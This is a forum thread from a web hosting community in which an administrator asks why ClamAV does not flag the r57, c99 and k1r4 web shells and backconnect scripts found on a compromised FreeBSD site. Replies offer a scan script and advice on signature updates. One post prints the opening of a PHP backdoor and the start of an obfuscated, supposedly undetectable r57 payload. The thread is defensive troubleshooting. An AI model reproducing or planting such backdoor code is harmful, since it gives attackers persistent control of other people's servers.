Results 1 to 11 of 11

Thread: clamav clamscan is not detecting r57.php or c99

  1. #1
    Join Date
    Oct 2009
    Posts
    101

    clamav clamscan is not detecting r57.php or c99

    # ls
    400.shtml 401.shtml 403.shtml 404.shtml 500.shtml balls cgi-bin logo.gif index.html r57.php
    # pwd
    /usr/home/soylandor1/domains/somedomainn.org/public_html
    # clamscan -i

    ----------- SCAN SUMMARY -----------
    Known viruses: 1131677
    Engine version: 0.97.3
    Scanned directories: 1
    Scanned files: 8
    Infected files: 0
    Data scanned: 0.12 MB
    Data read: 0.06 MB (ratio 1.88:1)
    Time: 5.256 sec (0 m 5 s)
    # clamscan -i -r ./

    ----------- SCAN SUMMARY -----------
    Known viruses: 1131677
    Engine version: 0.97.3
    Scanned directories: 3
    Scanned files: 23
    Infected files: 0
    Data scanned: 0.14 MB
    Data read: 0.07 MB (ratio 1.89:1)
    Time: 5.226 sec (0 m 5 s)
    #
    # ls balls
    bd.pl c99sh_backconn.661.pl c99sh_bindport.329.pl c99sh_bindport.941.pl k1r4_backconn.682.pl k1r4_bindport.119.pl k1r4_bindport.536.pl k1r4_bindport.893.pl k1r4_bindport.968.pl
    c2.php c99sh_bindport.115.c c99sh_bindport.749.pl k1r4_backconn.409.pl k1r4_backconn.887.pl k1r4_bindport.493.pl k1r4_bindport.616.pl k1r4_bindport.939.pl
    #
    # cd balls
    # clamscan -i -r ./

    ----------- SCAN SUMMARY -----------
    Known viruses: 1131677
    Engine version: 0.97.3
    Scanned directories: 1
    Scanned files: 12
    Infected files: 0
    Data scanned: 0.02 MB
    Data read: 0.01 MB (ratio 2.00:1)
    Time: 5.274 sec (0 m 5 s)
    #
    Last edited by questions; 02-07-2012 at 07:53 PM.

  2. #2
    Join Date
    Apr 2005
    Location
    GMT +7.00
    Posts
    11,023
    With regards, Alex.

    Professional Server Management for web hosting companies and individuals
    Hourly Support, Disaster Recovery, Server Hardening, Monthly Subscription
    Directadmin installation and optimization

    Click here if you need a Linux Admin

  3. #3
    Join Date
    Oct 2009
    Posts
    101
    yes, it should.

  4. #4
    Join Date
    Oct 2009
    Posts
    101
    Quote Originally Posted by zEitEr View Post
    ive got freebsd, and that script seems like it's a linux script and kind of messy... i might try it if i cant get clamav to work

  5. #5
    Join Date
    Apr 2005
    Location
    GMT +7.00
    Posts
    11,023
    If you manage to make ClamAV to detect web shells, please let me know, as I've never ever before been able to find them with ClamAV.
    With regards, Alex.

    Professional Server Management for web hosting companies and individuals
    Hourly Support, Disaster Recovery, Server Hardening, Monthly Subscription
    Directadmin installation and optimization

    Click here if you need a Linux Admin

  6. #6
    Join Date
    Apr 2005
    Location
    GMT +7.00
    Posts
    11,023
    Quote Originally Posted by questions View Post
    and kind of messy...
    Which one?
    With regards, Alex.

    Professional Server Management for web hosting companies and individuals
    Hourly Support, Disaster Recovery, Server Hardening, Monthly Subscription
    Directadmin installation and optimization

    Click here if you need a Linux Admin

  7. #7
    Join Date
    Aug 2008
    Posts
    4,697
    Turn on verbose then so you can see exactly what its checking. I have no problem scanning for c99 on any of my servers.

    Here is the shell script I run:

    Code:
    #!/bin/sh
    
    clear
    echo
    echo "Starting update process..."
    echo
    freshclam -v
    echo
    echo "Done."
    sleep 4
    clear
    echo
    echo "Starting scan process...This may take several hours...please be patient."
    echo
    cd / && clamscan -ir --exclude-dir=^/usr/ports/security/clamav --exclude-dir=^/sys --exclude-dir=^/dev --exclude-dir=^/proc --detect-pua=no --max-filesize=15M --scan-mail=no --log=/var/log/clamav/scanlog.log 
    echo
    echo "Done."
    echo
    Last edited by scsi; 02-08-2012 at 07:39 AM.

  8. #8
    Join Date
    Oct 2009
    Posts
    101
    # clamscan -r -i -v
    Scanning /usr/home/somedomainn/domains/somedomainn.org/public_html/cgi-bin/.htaccess
    Scanning /usr/home/somedomainn/domains/somedomainn.org/public_html/cgi-bin/foo.sh
    Scanning /usr/home/somedomainn/domains/somedomainn.org/public_html/cgi-bin/bd.pl
    Scanning /usr/home/somedomainn/domains/somedomainn.org/public_html/400.shtml
    Scanning /usr/home/somedomainn/domains/somedomainn.org/public_html/401.shtml
    Scanning /usr/home/somedomainn/domains/somedomainn.org/public_html/403.shtml
    Scanning /usr/home/somedomainn/domains/somedomainn.org/public_html/404.shtml
    Scanning /usr/home/somedomainn/domains/somedomainn.org/public_html/500.shtml
    Scanning /usr/home/somedomainn/domains/somedomainn.org/public_html/hblogo9.gif
    Scanning /usr/home/somedomainn/domains/somedomainn.org/public_html/index.html
    Scanning /usr/home/somedomainn/domains/somedomainn.org/public_html/r57.php
    Scanning /usr/home/somedomainn/domains/somedomainn.org/public_html/balls/bd.pl
    Scanning /usr/home/somedomainn/domains/somedomainn.org/public_html/balls/c2.php
    Scanning /usr/home/somedomainn/domains/somedomainn.org/public_html/balls/k1r4_bindport.968.pl
    Scanning /usr/home/somedomainn/domains/somedomainn.org/public_html/balls/k1r4_bindport.493.pl
    Scanning /usr/home/somedomainn/domains/somedomainn.org/public_html/balls/k1r4_bindport.939.pl
    Scanning /usr/home/somedomainn/domains/somedomainn.org/public_html/balls/k1r4_bindport.119.pl
    Scanning /usr/home/somedomainn/domains/somedomainn.org/public_html/balls/k1r4_bindport.893.pl
    Scanning /usr/home/somedomainn/domains/somedomainn.org/public_html/balls/k1r4_bindport.616.pl
    Scanning /usr/home/somedomainn/domains/somedomainn.org/public_html/balls/k1r4_bindport.536.pl
    Scanning /usr/home/somedomainn/domains/somedomainn.org/public_html/balls/k1r4_backconn.887.pl
    Scanning /usr/home/somedomainn/domains/somedomainn.org/public_html/balls/k1r4_backconn.409.pl
    Scanning /usr/home/somedomainn/domains/somedomainn.org/public_html/balls/k1r4_backconn.682.pl

    ----------- SCAN SUMMARY -----------
    Known viruses: 1131677
    Engine version: 0.97.3
    Scanned directories: 3
    Scanned files: 23
    Infected files: 0
    Data scanned: 0.14 MB
    Data read: 0.07 MB (ratio 1.89:1)
    Time: 11.030 sec (0 m 11 s)
    # cat ./balls/c2.php
    <?php
    // A robust backdoor script made by Daniel Berliner - http://www.qsdconsulting.com/ [3-15-2011]
    // This code is public domain and may be used in part or in full for any legal purpose. I would still appreciate a mention though .

    function isLinux($path)
    {
    return (substr($path,0,1)=="/" ? true : false);
    }
    function getSlashDir($isLinux)

    # cat r57.php
    666
    <?php /* WARNING: This file is protected encrypted via fud file no detecding. */
    $o="QAFzOzh3b3cNKAAAVi0oBpAAMAAAFSckJwAQAFK/9wCAJwCSAFIAAAknBZ8AAAYnBGEAQQVxAEAAsSQDzwAABScCwf79CLMDkAAwAQMD3wAABScC0SQAUwB0BCED3wAABCcDFiQAEj

  9. #9
    Join Date
    Oct 2009
    Posts
    101
    my ubuntu desktop scans with an OK at the end, but my FreeBSD server has no OK at the end, perhaps the hacker broke the server/clamav (I just installed clamav again last night on both server and desktop-ubuntu)


    this is how my desktop looks when i scan with clamav:

    admin1@admin1:~$ clamscan .
    LibClamAV Warning: ***********************************************************
    LibClamAV Warning: *** This version of the ClamAV engine is outdated. ***
    LibClamAV Warning: *** DON'T PANIC! Read http://www.clamav.net/support/faq ***
    LibClamAV Warning: ***********************************************************
    LibClamAV Warning: ***********************************************************
    LibClamAV Warning: *** This version of the ClamAV engine is outdated. ***
    LibClamAV Warning: *** DON'T PANIC! Read http://www.clamav.net/support/faq ***
    LibClamAV Warning: ***********************************************************
    LibClamAV Warning: ***********************************************************
    LibClamAV Warning: *** This version of the ClamAV engine is outdated. ***
    LibClamAV Warning: *** DON'T PANIC! Read http://www.clamav.net/support/faq ***
    LibClamAV Warning: ***********************************************************
    ./.dvdriprc: OK
    ./.recently-used: OK
    ./.openme.prefs: OK
    ./.dmrc: OK
    ./.odbc.ini: Empty file
    ./.DCP Builder: OK
    ./examples.desktop: OK
    ./.profile: OK
    ./.xsession-errors.old: OK
    ./.libquicktime_codecs: OK
    ./.printer-groups.xml: OK
    ./.sudo_as_admin_successful: Empty file
    ./.gtk-bookmarks: OK
    ./.ICEauthority: OK
    ./.esd_auth: OK
    ./.bash_logout: OK
    ./.bashrc: OK
    ./.bash_history: OK
    ./.gtk-recordmydesktop: OK
    ./clamscanlog.txt: OK
    ./.gksu.lock: Empty file
    ./.pulse-cookie: OK
    ./clipdat2.rdf: OK
    ./.ufrawrc: OK
    ./.xsession-errors: OK
    ./.recently-used.xbel: OK

    ----------- SCAN SUMMARY -----------
    Known viruses: 1132278
    Engine version: 0.96.5
    Scanned directories: 1
    Scanned files: 24
    Infected files: 0
    Data scanned: 1.69 MB
    Data read: 0.91 MB (ratio 1.85:1)
    Time: 4.835 sec (0 m 4 s)

  10. #10
    Join Date
    Aug 2008
    Posts
    4,697
    They must not match any signature in the virus database or your database is out of sync. Update the defintions with freshclam. If not copy the files to your ubuntu and see if they are caught.

  11. #11
    Join Date
    Oct 2009
    Posts
    101
    You can see that my server has more viruses and a newer version than my desktop. I've seen many other examples of clamscan catching c99 and r57 from other forums. Some people say it will some say it won't.

Similar Threads

  1. [Clamav-announce] announcing ClamAV 0.96.4
    By Meesterlijk in forum 3rd Party Software Version Updates
    Replies: 0
    Last Post: 10-26-2010, 12:12 AM
  2. Server Detecting Processor Speed Wrong?
    By EGS in forum General Technical Discussion & Troubleshooting
    Replies: 9
    Last Post: 09-11-2008, 10:46 AM
  3. [Clamav-announce] announcing ClamAV 0.93rc1
    By CoolZero in forum Required Software Version Updates
    Replies: 0
    Last Post: 03-04-2008, 03:43 AM
  4. [Clamav-announce] announcing ClamAV 0.92
    By CoolZero in forum Required Software Version Updates
    Replies: 0
    Last Post: 12-18-2007, 03:42 AM
  5. clamav detecting these correctly?
    By tarquel in forum General Technical Discussion & Troubleshooting
    Replies: 0
    Last Post: 12-22-2006, 04:13 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •